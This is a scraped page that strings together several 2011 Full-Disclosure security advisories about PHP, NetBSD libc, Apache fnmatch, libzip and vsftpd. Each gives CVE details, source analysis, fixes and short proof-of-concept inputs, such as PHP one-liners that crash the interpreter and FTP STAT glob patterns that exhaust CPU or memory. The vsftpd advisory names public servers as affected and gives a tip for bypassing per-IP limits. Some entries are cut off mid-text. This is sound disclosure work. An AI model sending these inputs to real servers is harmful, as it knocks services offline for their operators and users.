http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_iso_intervals.c?view=markup multiple malloc/calloc/realloc 323 uchar *buf = (uchar*) malloc(((s->lim - s->bot) + BSIZE)*sizeof(uchar)); 324 memcpy(buf, s->tok, s->lim - s->tok); 496 str = calloc(1, end - begin + 1); 497 memcpy(str, begin, end - begin); 346 s->errors->warning_messages = realloc(s->errors->warning_messages, s->errors->warning_count * sizeof(timelib_error_message)); 347 s->errors->warning_messages[s->errors->warning_count - 1].position = s->tok ? s->tok - s->str : 0; 348 s->errors->warning_messages[s->errors->warning_count - 1].character = s->tok ? *s->tok : 0; 349 s->errors->warning_messages[s->errors->warning_count - 1].message = strdup(error); - -id1-end- - -id2-start- http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_tz.c?view=markup 210 tz->location.comments = malloc(comments_len + 1); 211 memcpy(tz->location.comments, *tzf, comments_len); 212 tz->location.comments[comments_len] = '\0'; 213 *tzf += comments_len; - -id2-end- - -id3-start- http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/timelib.c?revision=305315&view=markup 124 tmp->trans = (int32_t *) malloc(tz->timecnt * sizeof(int32_t)); 125 tmp->trans_idx = (unsigned char*) malloc(tz->timecnt * sizeof(unsigned char)); 126 memcpy(tmp->trans, tz->trans, tz->timecnt * sizeof(int32_t)); 127 memcpy(tmp->trans_idx, tz->trans_idx, tz->timecnt * sizeof(unsigned char)); 128 129 tmp->
[Full-disclosure] PHP 5.3.6 ZipArchive invalid use glob(3)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ PHP 5.3.6 ZipArchive invalid use glob(3) ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://securityreason.net/ http://cxib.net/ Date: - - Dis.: 01.04.2011 - - Pub.: 19.08.2011 CVE: CVE-2011-1657 Affected Software (verified): PHP 5.3.6 and prior Fixed: PHP 5.3.7 Original URL: http://securityreason.com/achievement_securityalert/100 - --- 0.Description --- PHP is a general-purpose scripting language originally designed for web development to produce dynamic web pages. For this purpose, PHP code is embedded into the HTML source document and interpreted by a web server with a PHP processor module, which generates the web page document. It also has evolved to include a command-line interface capability and can be used in standalone graphical applications. ZipArchive This extension enables you to transparently read or write ZIP compressed archives and the files inside them. - --- 1. PHP 5.3.6 ZipArchive invalid use glob(3) --- Functions like addGlob and addPattern are not described in documentation. Anyway we can call to ZipArchive::addGlob and ZipArchive::addPattern in PHP 5.3.6 http://pl2.php.net/manual/en/class.ziparchive.php let's see ext/zip/php_zip.c 531 if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL, &globbuf))) { ... 1629/* 1 == glob, 2==pcre */ 1630if (type == 1) { 1631if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|la", 1632&pattern, &pattern_len, &flags, &options) == FAILURE) { 1633return; 1634} 1635} else { 1636if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|sa", 1637&pattern, &pattern_len, &path, &path_len, &options) == FAILURE) { 1638return; 1639} 1640} 1641 invalid &flags may provide to crash. To use flags like GLOB_ALTDIRFUNC, we should first declare gl_opendir, gl_closedir, gl_lstat, gl_stat. In PHP we only have 508 glob_t globbuf; ... 530 globbuf.gl_offs = 0; 531 if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL, &globbuf))) { for addglob() there are no GLOB flags validation like in php/glob(). Only flags like GLOB_MARK|GLOB_NOSORT|GLOB_NOCHECK|GLOB_NOESCAPE|GLOB_BRACE|GLOB_ONLYDIR|GLOB_ERR should be allowed: - - GLOB_MARK - Adds a slash to each directory returned - - GLOB_NOSORT - Return files as they appear in the directory (no sorting) - - GLOB_NOCHECK - Return the search pattern if no files matching it were found - - GLOB_NOESCAPE - Backslashes do not quote metacharacters - - GLOB_BRACE - Expands {a,b,c} to match 'a', 'b', or 'c' - - GLOB_ONLYDIR - Return only directory entries which match the pattern - - GLOB_ERR - Stop on read errors (like unreadable directories), by default errors are ignored. - ---linux/ubuntu--- cx@cx64:~$ php -v PHP 5.3.3-1ubuntu9.3 with Suhosin-Patch (cli) (built: Jan 12 2011 16:07:38) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies cx@cx64:~$ uname -a Linux cx64 2.6.35-28-generic #49-Ubuntu SMP Tue Mar 1 14:39:03 UTC 2011 x86_64 GNU/Linux cx@cx64:/www$ cat zip.php open("empty.zip");$nx->addGlob(str_repeat("*",33),0x39); ?>cx@cx64:/www$ php zip.php Segmentation fault - ---linux/ubuntu--- Tested with NetBSD glob(3) implementation (netbsd 5.1 and PHP 5.3.6) - ---bsd/netbsd--- unlink("empty.zip"); fopen("empty.zip","a"); $nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("A",100),0x39); Program received signal SIGSEGV, Segmentation fault. 0xbb86bb12 in realloc () from /usr/lib/libc.so.12 (gdb) i r eax0x410041 4259905 ecx0xc 12 edx0xbfb0 -1078984704 ebx0xbb8c81f4 -1148419596 esp0xbfbfa980 0xbfbfa980 ebp0xbfbfa9d8 0xbfbfa9d8 esi0xfc000 1032192 edi0x0 0 eip0xbb86bb12 0xbb86bb12 (gdb) x/i $eip 0xbb86bb12 : mov0x8(%eax),%edi (gdb) x/i $eax 0x410041: Cannot access memory at address 0x410041 - ---bsd/netbsd--- and now try 'B' - ---bsd/netbsd--- unlink("empty.zip"); fopen("empty.zip","a"); $nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("B",100),0x39); (gdb) x/i $eip 0xbb86bb12 : mov0x8(%eax),%edi (gdb) x/i $eax 0x420042: Cannot access memory at address 0x420042 - ---bsd/netbsd--- A we get mov0x8(%eax),%edi where eax=0x410041 B we get mov0x8(%eax),%edi where eax=0x420042 and once again for eax=0x0 - ---bsd/netbsd--- $nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob("aa",0x39); Program received signal SIGSEGV, Segmentation fault. 0xbb8e2960 in pthread_mutex_lock () from /usr/lib/libpthread.so.0 (gdb) bt #0
[Full-disclosure] NetBSD 5.1 libc/net multiple functions stack buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ NetBSD 5.1 libc/net multiple functions stack buffer overflow ] Author: Maksymilian Arciemowicz http://netbsd.org/donations/ Date: - - Dis.: 01.04.2011 - - Pub.: 01.07.2011 CVE: CVE-2011-1656 CWE: CWE-121 Affected software: - - NetBSD 5.1 (fixed) Affected functions: - - getservbyname(3) - - getservbyname_r(3) - - getservbyport(3) - - getservbyport_r(3) - - getaddrinfo(3) - - getnameinfo(3) Original URL: http://securityreason.com/achievement_securityalert/99 - --- 0.Description --- The getservbyname(), and getservbyport() functions each return a pointer to an object with the following structure containing the broken-out fields of a line in the network services data base, struct servent * getservbyname(const char *name, const char *proto); struct servent * getservbyport(int port, const char *proto); The getservbyname() and getservbyport() functions sequentially search from the beginning of the file until a matching protocol name or port number is found, or until EOF is encountered. If a protocol name is also supplied (non-NULL), searches must also match the protocol. - --- 1. NetBSD 5.1 libc/net multiple functions stack buffer overflow --- The main problem exists in files like getservbyname_r.c and getservbyport_r.c. Functions getservbyname*(3), getservbyport*(3) and getaddrinfo(3) of NetBSD libc implementation, provides to possible buffer overflow. To demonstrate this issue, we may use PHP as an attack vector. 127# php -r 'getservbyname("A",str_repeat("A",7108));' 127# php -r 'getservbyname("A",str_repeat("A",7109));' Memory fault (core dumped) - -php-5.3.6/ext/standard/basic_functions.c--- PHP_FUNCTION(getservbyname) { char *name, *proto; int name_len, proto_len; struct servent *serv; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "ss", &name, &name_len, &proto, &proto_len) == FAILURE) { return; } ... serv = getservbyname(name, proto); < CALL TO LIBC - -php-5.3.6/ext/standard/basic_functions.c--- BT: #0 0xbb8b2d65 in __log2 () from /usr/lib/libc.so.12 #1 0xbb8afa2e in __call_hash () from /usr/lib/libc.so.12 #2 0xbb8b0ebd in __hash_open () from /usr/lib/libc.so.12 #3 0xbb8884c2 in getservbyname_r () from /usr/lib/libc.so.12 #4 0xbb822f6f in getservbyname () from /usr/lib/libc.so.12 #5 0x08334458 in php_get_highlight_struct () Let's see what is wrong with getservbyname(). - -getservbyname.c--- struct servent * getservbyname(const char *name, const char *proto) { struct servent *s; mutex_lock(&_servent_mutex); s = getservbyname_r(name, proto, &_servent_data.serv, &_servent_data); <=== REFERENCE mutex_unlock(&_servent_mutex); return (s); } - -getservbyname.c--- as we can see, getservbyname(3) redirect to getservbyname_r(3) function. - -getservbyname_r.c--- if (sd->flags & _SV_DB) { char buf[BUFSIZ]; DBT key, data; DB *db = sd->db; key.data = buf; if (proto == NULL) key.size = snprintf(buf, sizeof(buf), "\376%s", name); <= INVALID key.size HERE else key.size = snprintf(buf, sizeof(buf), "\376%s/%s", <= INVALID key.size HERE name, proto); key.size++; if ((*db->get)(db, &key, &data, 0) != 0) return NULL; if ((*db->get)(db, &data, &key, 0) != 0) return NULL; - -getservbyname_r.c--- key.size may be bigger as BUFSIZ. snprintf(3) return number of characters that would have been written had size been sufficiently large (not counting the terminating null). In this case, snprintf(3) return bigger value as sizeof(buf). In older libc implementations, snprintf(3) should return -1, if the string is truncated. The same problem is with getservbyport_r(3). - -getservbyname_r.c--- if (sd->flags & _SV_DB) { char buf[BUFSIZ]; DBT key, data; DB *db = sd->db; key.data = buf; port = htons(port); if (proto == NULL) key.size = snprintf(buf, sizeof(buf), "\377%d", port); <= INVALID key.size HERE else key.size = snprintf(buf, sizeof(buf), "\377%d/%s", port, <= INVALID key.size HERE proto); key.size++; if ((*db->get)(db, &key, &data, 0) != 0) return NULL; if ((*db->get)(
[Full-disclosure] Multiple Vendors libc/fnmatch(3) DoS (incl apache poc)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ] Author: Maksymilian Arciemowicz http://netbsd.org/donations/ http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 29.01.2011 - - Pub.: 13.05.2011 CVE: CVE-2011-0419 CWE: CWE-399 Affected Software (verified): - - Apache 2.2.17 - - NetBSD 5.1 - - OpenBSD 4.8 - - FreeBSD - - MacOSX 10.6 - - SunSolaris 10 Original URL: http://securityreason.com/achievement_securityalert/98 - --- 0.Description --- fnmatch -- match filename or pathname using shell glob rules SYNOPSIS #include int fnmatch(const char *pattern, const char *string, int flags); - --- 1. Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) --- Attacker, what may modify first and second parameters(pattern,string) of fnmatch(3), may cause to CPU resource exhaustion. To see problem huge complexity, try compile code below: fnmatch("?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*","xx",0); fnmatch should return quickly answer, logically int. - -fnmatch()/netbsd/fnmatch.c-- /* Collapse multiple stars. */ while (c == '*') c = FOLDCASE(*++pattern, flags); - -fnmatch()/netbsd/fnmatch.c-- fnmatch() skip multiple stars here. It protect us before patterns like "...", but not before "*?*?*?*?*?*?*?*?*?*?*?...". Let's see what will happen if we use single star in pattern: - -fnmatch()/netbsd/fnmatch.c-- case '*': c = FOLDCASE(*pattern, flags); /* Collapse multiple stars. */ while (c == '*') c = FOLDCASE(*++pattern, flags); if (*string == '.' && (flags & FNM_PERIOD) && (string == stringstart || ((flags & FNM_PATHNAME) && *(string - 1) == '/'))) return (FNM_NOMATCH); ... /* General case, use recursion. */ while ((test = FOLDCASE(*string, flags)) != EOS) { if (!fnmatch(pattern, string, <== RECURSION flags & ~FNM_PERIOD)) return (0); if (test == '/' && flags & FNM_PATHNAME) break; ++string; } return (FNM_NOMATCH); - -fnmatch()/netbsd/fnmatch.c-- Recursion in this code: if (!fnmatch(pattern, string, <=== RECURSION WITHOUT LIMITS may cause to denial of service. Some recursion limit is missing here. Fix has been created together with NetBSD and should work on all BSD's implementations of fnmatch(3). To fix it, limit recursion_level to 64, because it guaranty quickly result. e.g. - -fix--- ... static int fnmatchx(const char *pattern, const char *string, int flags, size_t recursion) <=== ADD ( size_t recursion ) { const char *stringstart; char c, test; _DIAGASSERT(pattern != NULL); _DIAGASSERT(string != NULL); if (recursion-- == 0) <=== DECREMENT recursion_level return FNM_NORES; ... int fnmatch(const char *pattern, const char *string, int flags) { return fnmatchx(pattern, string, flags, 64); <=== SET recursion_level HERE } ... - -fix--- This fix limit max recursion level to 64. Any bigger value, may be unsafe. To demonstrate this flaws, i'm using apache with mod_autoindex because it's best vector here. There are two ways to denial of service, local and remote. IMPORTANT: fnmatch(const char *pattern, const char *string, int flags); strlen(string) should be smaller as strlen(pattern) let's start - -apache.2.2.17;apr_fnmatch();srclib/apr/strings/apr_fnmatch.c--- ... /* Collapse multiple stars. */ while (c == '*') { c = *++pattern; } ... /* General case, use recursion. */ while ((test = *string) != EOS) { if (!apr_fnmatch(pattern, string, flags & ~APR_FNM_PERIOD)) { <=== RECURSION return (APR_SUCCESS); ... - -apache.2.2.17;apr_fnmatch();srclib/apr/strings/apr_fnmatch.c--- This is BSD implementation of
[Full-disclosure] Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion ] Author: Maksymilian Arciemowicz http://netbsd.org/donations/ http://securityreason.com/ http://cxib.net/ Date: - Dis.: 19.01.2011 - Pub.: 02.05.2011 CVE: CVE-2011-0418 Affected Software (verified): - - NetBSD 5.1 - - and more Original URL: http://securityreason.com/achievement_securityalert/97 - --- 0.Description --- #include int glob(const char *pattern, int flags, int (*errfunc)(const char *epath, int eerrno), glob_t *pglob); Description This function expands a filename wildcard which is passed as pattern. GLOB_LIMIT Limit the amount of memory used by matches to ARG_MAX. This option should be set for programs that can be coerced to a denial of service attack via patterns that expand to a very large number of matches, such as a long string of */../*/.. - --- 1. Multiple Vendors libc/glob(3) GLOB_BRACE|GLOB_LIMIT memory exhaustion --- Analyzing history of GLOB_LIMIT, we should start since 2001, where it has been added to protect ftp servers before memory exhaustion. http://www.mail-archive.com/bugtraq@securityfocus.com/msg04960.html Any 'pattern', should be limited and controlled by GLOB LIMIT. Algorithm used in glob(3) is not optimal, and doesn't support functions like realpath() to eliminate duplicates. It's not easy to predict the greatest possible complexity. Anyway in 2010, netbsd has extended GLOB_LIMIT for a few new limits like: stats, readdir and malloc OpenBSD has localized some integer overflow. In glob(3) function, exists some malloc() allowing allocate nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/glob.c.diff?r1=1.34;r2=1.35;f=h - -globextend()/openbsd-- 749: newn = 2 + pglob->gl_pathc + pglob->gl_offs; 750: if (pglob->gl_offs >= INT_MAX || 751: pglob->gl_pathc >= INT_MAX || 752: newn >= INT_MAX || 753: SIZE_MAX / sizeof(*pathv) <= newn || 754: SIZE_MAX / sizeof(*statv) <= newn) { 755: nospace: 756: for (i = pglob->gl_offs; i < (ssize_t)(newn - 2); i++) { 757: if (pglob->gl_pathv && pglob->gl_pathv[i]) 758: free(pglob->gl_pathv[i]); 759: if ((pglob->gl_flags & GLOB_KEEPSTAT) != 0 && 760: pglob->gl_pathv && pglob->gl_pathv[i]) 761: free(pglob->gl_statv[i]); 762: } 763: if (pglob->gl_pathv) { 764: free(pglob->gl_pathv); 765: pglob->gl_pathv = NULL; 766: } 767: if (pglob->gl_statv) { 768: free(pglob->gl_statv); 769: pglob->gl_statv = NULL; 770: } 771: return(GLOB_NOSPACE); 772: } - -globextend()/openbsd-- however SIZE_MAX and INT_MAX doesn't protect us before memory exhaustion. The real problem here is uncontrolled malloc(3) call. globextend() will be executed a lot of times and we should reduce calls to glob0() and globexp1(). Therefore has been created a new limit, limiting 'braces' used in 'pattern'. http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=text&tr1=1.27&r2=text&tr2=1.29 If we don't reduce this call - -globextend()/netbsd-- static int globextend(const Char *path, glob_t *pglob, size_t *limit) { char **pathv; size_t i, newsize, len; char *copy; const Char *p; _DIAGASSERT(path != NULL); _DIAGASSERT(pglob != NULL); newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs); pathv = pglob->gl_pathv ? realloc(pglob->gl_pathv, newsize) : malloc(newsize); < UNSECURE CALL ... - -globextend()/netbsd-- newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs); malloc(3) try allocate (4*pglob->gl_pathc) bytes. - -PoC- USER anonymous PASS b...@bla.bla STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b} - -PoC- in result we get Jan 19 04:49:17 127 /netbsd: UVM: pid 615 (ftpd), uid 1003 killed: out of swap Many servers are still vulnerable to the above vulnerability and CVE-2010-4754, CVE-2010-4755, CVE-2010-4756, CVE-2010-2632. Servers like ftp.sun.com ftp.sony.com seems still be affected. - --- 2. References --- http://securityreason.com/achievement_securityalert/89 http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2010-008.txt.asc http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html http://support.avaya.com/css/P8/documents/10012789
[Full-disclosure] libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5) ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 03.01.2011 - - Pub.: 18.03.2011 CVE: CVE-2011-0421 CERT: VU#325039 Affected Software: - - libzip 0.9.3 - - PHP 5.3.5 (fixed 5.3.6) Original URL: http://securityreason.com/achievement_securityalert/96 - --- 0.Description --- libzip is a C library for reading, creating, and modifying zip archives. Files can be added from data buffers, files, or compressed data copied directly from other zip archives. Changes made without closing the archive can be reverted. The API is documented by man pages. - --- 1.Description --- libzip allows remote and local attackers to Denial of Service (Null Pointer Dereference) if ZIP_FL_UNCHANGED flag is set. - -lib/zip_name_locate.c--- int _zip_name_locate(struct zip *za, const char *fname, int flags, struct zip_error *error) { int (*cmp)(const char *, const char *); const char *fn, *p; int i, n; if (fname == NULL) { _zip_error_set(error, ZIP_ER_INVAL, 0); return -1; } cmp = (flags & ZIP_FL_NOCASE) ? strcasecmp : strcmp; n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <= CRASH HERE - -lib/zip_name_locate.c--- for empty zip file and ZIP_FL_UNCHANGED flag, libzip should crash. Currently for PHP, the security impact we estimate only like a remote DoS, so risk is low. Project using libzip: KDE Utilities (4.x branch), MySQL Workbench, ckmame, fuse-zip, php zip extension, Endeavour2, FreeDink Better analysis based on PHP code ZipArchive, bellow - --- 2. PHP 5.3.5 ZipArchive() --- PoC1: php -r '$nx=new ZipArchive();$nx->open("/dev/null");$nx->locateName("a",ZIPARCHIVE::FL_UNCHANGED);' PoC2: php -r '$nx=new ZipArchive();$nx->open("empty.zip");$nx->statName("a",ZIPARCHIVE::FL_UNCHANGED);' Let's - -php_zip.c- ... static ZIPARCHIVE_METHOD(locateName) { ... ZIP_FROM_OBJECT(intern, this); if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &name, &name_len, &flags) == FAILURE) { return; } ... idx = (long)zip_name_locate(intern, (const char *)name, flags); <=== CRASH IN THIS FUNCTION ... - -php_zip.c- and let`s see - -zip_name_locate.c- ZIP_EXTERN(int) zip_name_locate(struct zip *za, const char *fname, int flags) { return _zip_name_locate(za, fname, flags, &za->error); } int _zip_name_locate(struct zip *za, const char *fname, int flags, struct zip_error *error) { int (*cmp)(const char *, const char *); const char *fn, *p; int i, n; if (fname == NULL) { _zip_error_set(error, ZIP_ER_INVAL, 0); return -1; } cmp = (flags & ZIP_FL_NOCASE) ? strcmpi : strcmp; n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <=== CRASH HERE IF ZIPARCHIVE::FL_UNCHANGED for (i=0; icdir->nentry : za->nentry; (gdb) print za->cdir->nentry Cannot access memory at address 0x8 (gdb) print za->nentry $21 = 0 because (gdb) x/i $rip => 0x6407cc <_zip_name_locate+236>: mov0x8(%rax),%eax (gdb) x/i $rax 0x0: Cannot access memory at address 0x0 (gdb) x/i $eax call to zip_name_locate (gdb) n 1877idx = (long)zip_name_locate(intern, (const char *)name, flags); (gdb) print intern $24 = (struct zip *) 0x118d580 (gdb) x/x intern 0x118d580: 0x0118d220 (gdb) x/40x intern 0x118d580: 0x0118d220 0x 0x0118d340 0x 0x118d590: 0x 0x 0x 0x 0x118d5a0: 0x 0x 0x 0x 0x118d5b0: 0x 0x 0x 0x 0x118d5c0: 0x 0x 0x 0x 0x118d5d0: 0x 0x 0x 0x 0x118d5e0: 0x 0x 0x00020a21 0x 0x118d5f0: 0x 0x 0x 0x 0x118d600: 0x 0x 0x 0x 0x118d610: 0x 0x 0x 0x next PoC2 $nx=new ZipArchive();$nx->open("empty.zip");$nx->statName("9223372036854775808","9223372036854775807"); rogram received signal SIGSEGV, Segmentation fault. 0x006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0 "9223372036854775808", flags=32767, error=0xdac0) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65 65 in /build/buildd/php5-5.3.3
[Full-disclosure] vsftpd 2.3.2 remote denial-of-servic
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ vsftpd 2.3.2 remote denial-of-service ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 23.12.2010 - - Pub.: 01.03.2011 CVE: CVE-2011-0762 CERT: VU#590604 Fix: vsftpd 2.3.4 (15.02.2011) Affected Software (verified): - - vsftpd 2.3.2 (NetBSD 5.1) - - vsftpd 2.3.0 (Ubuntu 10.10) Affected Servers (19.02.2011): - - ftp.gnu.org (2.0.6) - - ftp.kernel.org (2.2.2) - - ftpgen.wip4.adobe.com (2.3.2) - - ftp.oracle.com (2.0.5) - - ftp.freebsd.org (2.2.0) - - more more more... Original URL: http://securityreason.com/achievement_securityalert/95 - --- 0.Description --- vsftpd is a GPL licensed FTP server for UNIX systems, including Linux. It is secure and extremely fast. It is stable. Don't take my word for it, though. Below, we will see evidence supporting all three assertions. We will also see a list of a few important sites which are happily using vsftpd. This demonstrates vsftpd is a mature and trusted solution. - --- 1. vsftpd 2.3.2 remote denial-of-service --- As we can read in "ls.c" vsftpd file... - --- ... * parsing and handling. There is broad potential for any given fnmatch(3) * implementation to be buggy. * * Currently supported pattern(s): * - any number of wildcards, "*" or "?" * - {,} syntax (not nested) ... - --- That true but anyone who has changed ftpd bsd daemon to vsftpd to protect before CVE-2010-2632 (glob(3) resource exhaustion) are in danger. Any code with huge complexity, could allow of denial of service if an affected system received vulnerable pattern. This bug allow to disable wide range of servers. To designate vulnerable servers, we have to used pattern with medium complexity. - -Example affected server--- cx@cx64:~$ telnet ftp.gnu.org 21 Trying 140.186.70.20... Connected to ftp.gnu.org. Escape character is '^]'. 220 GNU FTP server ready. USER anonymous PASS a...@cadabra.abw STAT {{*},} ... 230 Login successful. 230 Already logged in. 213-Status follows: - -Example affected server--- Execution time may have wide range depending on the length of pattern: empty 2388 97.3 0.0 37980 1352 ?RDec23 222:42 /usr/sbin/vsftpd 222m and counting... so any next {{*},Recursion} will increment the complexity. Let's see what is wrong and where. In vsftpd the main problem exists in ls.c. - -ls.c-- int vsf_filename_passes_filter(const struct mystr* p_filename_str, const struct mystr* p_filter_str) { ... else if (last_token == '{') { struct str_locate_result end_brace = str_locate_char(&filter_remain_str, '}'); must_match_at_current_pos = 1; if (end_brace.found) { str_split_char(&filter_remain_str, &temp_str, '}'); str_copy(&brace_list_str, &filter_remain_str); str_copy(&filter_remain_str, &temp_str); str_split_char(&brace_list_str, &temp_str, ','); while (!str_isempty(&brace_list_str)) { str_copy(&new_filter_str, &brace_list_str); str_append_str(&new_filter_str, &filter_remain_str); if (vsf_filename_passes_filter(&name_remain_str, &new_filter_str)) <= LIMIT THIS CALL { ret = 1; ... - -ls.c-- Code: if (vsf_filename_passes_filter(&name_remain_str, &new_filter_str)) <= LIMIT THIS CALL this call should be limited, and in version 2.3.4 has been fixed. A simple way to show growth in computing power ... (1*2*3*4*...*count(vsf_filename_passes_filter complexity)) == count(vsf_filename_passes_filter complexity)! Compare two patterns and see different between STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}} and add next {*,...} STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}} and in the end, compare: STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}]}}} hovever in vsftpd, command lenght is allowed to 4096 bytes. So it's no problem to create request with a huge complexity To bypass max_per_ip, use ISP with dynamic ip. Disconnect and connect (example for bt mobile phone): cx@cx64:~$ hciconfig hci0 down cx@cx64:~$ hciconfig hci0 up and connect again. - ---PoC
Re: [Full-disclosure] glibc and alloca()
Chris Evans gmail.com> writes: > Linux distribution might still have vulnerabilities in this area. proftpd use gnu libc implementation http://www.proftpd.org/docs/RELEASE_NOTES-1.3.4rc1 + Updated fnmatch implementation, using glibc-2.9 version. Version 1.3.3d may contain this issue -- Best Regards pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) sub 4096R/58BA663C 2010-09-19 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.3.5 grapheme_extract() NULL Pointer Dereference
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 09.12.2010 - - Pub.: 17.02.2011 CVE: CVE-2011-0420 CERT: VU#210829 Affected Software: - - PHP 5.3.5 Fixed: SVN Original URL: http://securityreason.com/achievement_securityalert/94 - --- 0.Description --- Internationalization extension (further is referred as Intl) is a wrapper for ICU library, enabling PHP programmers to perform UCA-conformant collation and date/time/number/currency formatting in their scripts. grapheme_extract ? Function to extract a sequence of default grapheme clusters from a text buffer, which must be encoded in UTF-8. - --- 1. PoC for grapheme_extract() --- grapheme_extract('a',-1); Change length of first parameter to change rip. - --- 2. grapheme_extract() NULL Pointer Dereference --- As we can see in grapheme_extract(str,size) - -grapheme_extract()-- ... if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char **)&str, &str_len, &size, &extract_type, &lstart, &next) == FAILURE) { <=== str='a' and size='-1' ... /* if the string is all ASCII up to size+1 - or str_len whichever is first - then we are done. (size + 1 because the size-th character might be the beginning of a grapheme cluster) */ if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 : str_len ) ) { <=== ( size=-1+1=0 ) === long nsize = ( size < str_len ? size : str_len ); <=== nsize = -1 if ( NULL != next ) { ZVAL_LONG(next, start+nsize); } RETURN_STRINGL(((char *)pstr), nsize, 1); <=== CRASH POINT } ... - -grapheme_extract()-- if we call to grapheme_ascii_check(pstr,0) where - -grapheme_ascii_check()-- /* {{{ grapheme_ascii_check: ASCII check */ int grapheme_ascii_check(const unsigned char *day, int32_t len) < len=0 { int ret_len = len; while ( len-- ) { if ( *day++ > 0x7f ) return -1; } return ret_len; <=== return 0 } - -grapheme_ascii_check()-- then we get (int)0 in result and long nsize = ( size < str_len ? size : str_len ); will be -1. Therefore, RETURN_STRINGL(((char *)pstr), nsize, 1); give NULL pointer dereference here. Changing length of first parameter of grapheme_extract(), we will also change rip in memcpy(3). (gdb) r -r 'grapheme_extract('a',-1);' ... (gdb) x/i $rip => 0x75511d99 : 